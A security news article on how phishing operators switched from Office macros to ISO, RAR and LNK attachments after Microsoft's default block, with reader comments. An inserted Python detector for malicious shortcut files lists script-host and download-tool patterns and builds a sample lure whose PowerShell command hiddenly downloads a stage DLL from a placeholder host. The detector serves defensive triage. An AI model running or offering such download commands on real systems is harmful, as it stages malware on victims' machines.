As Microsoft blocks Office macros, hackers find new attack vectors


Hackers who normally distributed malware via phishing attachments with malicious macros gradually changed tactics after Microsoft Office began blocking them by default, switching to new file types such as ISO, RAR, and Windows Shortcut (LNK) attachments.

VBA and XL4 Macros are small programs created to automate repetitive tasks in Microsoft Office applications, which threat actors abuse for loading, dropping, or installing malware via malicious Microsoft Office document attachments sent in phishing emails.

The switch was prompted by Microsoft's announcement that it would curb the massive abuse of Office macros by blocking them by default and making them harder to enable.

Although the rollout took Microsoft longer than planned, the block finally took effect last week.

However, the initial announcement alone convinced malware operators to move away from macros and begin experimenting with alternative methods to infect victims.

Hackers abandon macros

In a new report by Proofpoint, researchers looked at malicious campaign stats between October 2021 and June 2022 and identified a clear shift to other methods of payload distribution, recording a decrease of 66% in the use of macros.

At the same time, the use of container files such as ISOs, ZIPs, and RARs has grown steadily, rising by almost 175%.

[Figure: Comparison between macros and container files in campaigns (Proofpoint)]

The use of LNK files exploded after February 2022, the time of Microsoft’s announcement, increasing by a whopping 1,675% compared to October 2021, and being the weapon of choice of ten individual threat groups tracked by Proofpoint.

[Figure: Malicious LNK file use rose to unprecedented levels (Proofpoint)]

We have reported on the use of LNK files by Emotet, Qbot, and IcedID, in all cases masquerading as a Word document to trick the recipient into opening it.

However, these shortcut files can be used to execute almost any command the user has permission to run, including PowerShell scripts that download and execute malware from remote sources.

[Figure: Windows shortcut running a PowerShell command to install Emotet (Source: BleepingComputer)]
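Because a shortcut's target and command line are stored in plain structures inside the file, a mail gateway or triage script can read them without executing anything. The following is an added example (not code from BleepingComputer or Proofpoint) that parses the Shell Link header and StringData blocks according to the MS-SHLLINK layout, then applies a small set of assumed heuristics for the pattern the article describes: a shortcut whose target is a script host such as powershell.exe, launched hidden, with a command line that fetches content from a remote URL. Both sample shortcuts are constructed in the block; the URL `example.invalid` and the indicator names are placeholders, and the regex set is this example's own, not a vendor rule set.

```python
import re
import struct

# Constants from the MS-SHLLINK specification (Shell Link Binary File Format).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window minimized

# StringData blocks appear in this fixed order, each present only if its flag bit is set.
STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Extract LinkFlags, ShowCommand and the StringData fields of a .lnk file."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # skip the IDList; its size is a 2-byte prefix
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # skip LinkInfo; its first DWORD is its total size
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


# Assumed heuristics for this example: script hosts and command-line traits worth flagging.
SCRIPT_HOST_RE = re.compile(
    r"(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?", re.I)
ARG_PATTERNS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_download": re.compile(
        r"(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget|https?://)", re.I),
}


def assess_lnk(data: bytes) -> dict:
    """Parse a shortcut and return the indicators found plus a coarse verdict."""
    info = parse_lnk(data)
    indicators = []
    target = (info.get("relative_path") or "").replace("/", "\\").rsplit("\\", 1)[-1]
    if SCRIPT_HOST_RE.fullmatch(target):
        indicators.append(f"target_is_script_host:{target.lower()}")
    args = info.get("arguments", "")
    for name, pattern in ARG_PATTERNS.items():
        if pattern.search(args):
            indicators.append(name)
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        indicators.append("minimized_window")
    return {"fields": info, "indicators": indicators, "suspicious": len(indicators) >= 2}


def build_lnk(relative_path: str, working_dir: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal valid .lnk (header + three StringData blocks) for testing; constructed data."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body


# Constructed samples: a lure-style shortcut and an ordinary one. The URL is a placeholder.
MALICIOUS_SAMPLE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    r'-w hidden -ep bypass -c "iwr http://example.invalid/stage -OutFile $env:TEMP\stage.dll"',
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_SAMPLE = build_lnk(
    r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\alice\Documents", "")

if __name__ == "__main__":
    for label, sample in (("lure", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = assess_lnk(sample)
        print(label, result["suspicious"], result["indicators"])
```

The parser only skips the optional LinkTargetIDList and LinkInfo blocks by their declared sizes, which is enough to reach the StringData where the target path and arguments live; a production tool should also walk the IDList and ExtraData blocks, since a shortcut can omit the relative path and carry its target only there.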

Finally, Proofpoint also observed a significant increase in the use of HTML attachments adopting the HTML smuggling technique to drop a malicious file on the host system. However, their distribution volumes continue to remain small.

Shifting the threat

While seeing macros becoming an obsolete method of payload distribution and initial infection is a positive development, the threat has merely shifted rather than being addressed or reduced.

The question that needs answers now is how that change impacts the effectiveness of the malware campaigns, as convincing recipients to open .docx and .xls files was a lot easier than asking them to unpack archives and open files whose names end with .lnk.

Furthermore, to bypass detection by security software, many phishing campaigns now password-protect archive attachments, adding another burdensome step a target must take to access the malicious files.

From that perspective, threat actors relying on phishing emails might be running out of good options, and their infection rates may have dropped as a result.

Finally, email security solutions now have a narrower spectrum of potential risks to evaluate, improving their chances of catching a risky file.


  • BH0 – 4 days ago

    Malware is distributed when the user clicks and runs the macro in more than 90% of cases. It's like a law to drive 30mph on a highway, because you COULD crash. This is pure nonsense and the amount of complications in companies around the world... Buggy updates, crashing computers, planned obsolescence and ever-growing HW requirements.

  • scpcguy – 4 days ago

    @BH0 that is precisely why Microsoft is right to block Office macros by default, as well as .LNK files being emailed through Office 365. Google does the same. More than 90% of the time users can be trusted to do exactly the wrong thing.

    If an enterprise relies heavily on Office macros there are ways to make accommodations.

  • BH0 – 3 days ago

    Most of the users clicking the malicious link are home users. No need to disable all macros in the Pro and Ent versions. Just my opinion.

  • Yournicknamehere – 2 days ago

    “Most of the users clicking the malicious link are home users. No need to disable all macros in the Pro and Ent versions. Just my opinion.”

    Nope, I track Defender’s alerts and approve remediation of quarantined emails cached by Defender for Applications, and it seems like most “clicks” on malicious URLs happen without user interaction.
    I guess some kind of exploit allowing actors to open URLs after delivery still exists.

  • BH0 – 14 hours ago

    Thank you for sharing your experience. If “clicks” happen without user interaction, will disabling macros help to reduce infections, from your angle of view?
